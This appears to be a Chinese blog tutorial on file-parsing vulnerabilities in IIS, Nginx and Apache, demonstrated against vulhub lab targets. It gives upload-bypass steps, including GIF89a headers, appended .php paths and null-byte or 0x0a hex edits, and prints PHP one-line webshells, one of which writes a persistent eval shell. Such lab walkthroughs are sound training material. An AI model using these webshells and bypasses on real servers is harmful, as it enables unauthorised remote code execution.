当前位置: 首页 > article >正文

中间件解析了漏洞【IIS Nginx Apache】

IIS

1.IIS6.X

1.使用Windows2003虚拟机,在其中安装IIS6.X

2.在IIS6.X中,.asp文件夹中的文件都会被当作asp文件去执行

我们在网站根目录创建一个x.asp文件

在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。 

在外部浏览器中访问windows2003的iis网站中的2.jpg 发现asp代码被执行 

2.IIS7.X

1.php.ini⾥的cgi.fix_pathinfo=1 开启,把前面的分号去掉就算开启了

2.IIS7在Fast-CGI运⾏模式下

3.将PHP⼀句话木马写到1.php并更改后缀为1.jpg上传到⽬标站点...利⽤解析漏洞进行访问

4.蚁剑连接

Nginx

1.nginx_parsing

1.在kali中开启vluhub靶场

在vluhub中找到Nginx中的靶场,运行docker-compose文件就是开启靶场

docker-compose up -d

2.运行docker-compose ps -a查看进程

3.访问

4.制作图片马进行上传,并获取木马地址

GIF89a是图片标识,如果不加会导致网站不认可我们的jpg文件

注意:cmd要加上引号

5.访问我们的图片马

访问不到我们的一句话木马,那么我们就要在目录后面加上.php让网站将我们的文件进行php解析

6.蚁剑连接

2.CVE-2013-4547 

1.开启环境,同上

2.访问靶机

3.上传文件shell.php,抓包,将php改为jpg并在jpg后面加上两个空格和.php

4.在Hex中将第二个空格改为00

5.放行,上传成功

6.访问这个shell.jpg并进行抓包,将get后面参数加上两个空格,和.php

7.在hex中依旧将第二个空格改为00

Apache

1.apache_parsing

1.开启靶机

2.访问靶机并上传 shell.php.jpg 文件,文件内容为GIF89a
<?php fputs(fopen("shw.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

3.蚁剑连接

2.CVE-2017-15715

 1。开启靶机

2.访问靶机并上传 shell.jpg 文件,文件内容为GIF89a
<?php @eval($_POST['cmd']);?>,filename为1.php

3.抓包,在php后面加上空格,并把hex中的空格改为0a

 

4.放行访问1.php%0A

5,蚁剑连接


http://www.kler.cn/a/300888.html

相关文章:

  • FLASK创建下载
  • systemverilog中type typedef的区别
  • 【C语言】_字符串追加/连接函数strcat
  • 【机器学习:二十二、机器学习项目开发的技巧】
  • uni-app编写微信小程序使用uni-popup搭配uni-popup-dialog组件在ios自动弹出键盘。
  • python基础语法(1) ------- 学习笔记分享
  • Request Response
  • React 高阶组件 和 受控组件
  • 基于SpringBoot+Vue的古诗词学习软件系统
  • 单线程 TCP/IP 服务器和客户端的实现
  • C++ 在项目中使用Linux命令
  • solidity学习-15异常
  • 【CSS】 Grid布局:现代网页设计的基石
  • DML(Data Manipulation Language,数据操作语言)
  • Kubernetes上安装Metallb和Ingress并部署应用程序
  • 本地安装Ollama+WebUI
  • 大模型实战教程:使用Langchain与ChatGLM实现本地知识库
  • Linux驱动.之驱动开发思维,设备,驱动,总线分析思想,驱动的分类(字符设备,块设备,网络设备)
  • 多线程和高并发-17题
  • 使用 Homebrew 在 macOS 上安装 Conda
  • flume系列之:记录一次flume agent进程被异常oom kill -9的原因定位
  • 达林顿管阵列ULN2803(8路反向器电路)
  • C++学习笔记(18)
  • java八股!5(线程创建+并发容器+线程锁)
  • react18基础教程系列--packagejson文件分析
  • “人人都是产品经理”到AI产品经理,赶上风口的人都赚到了钱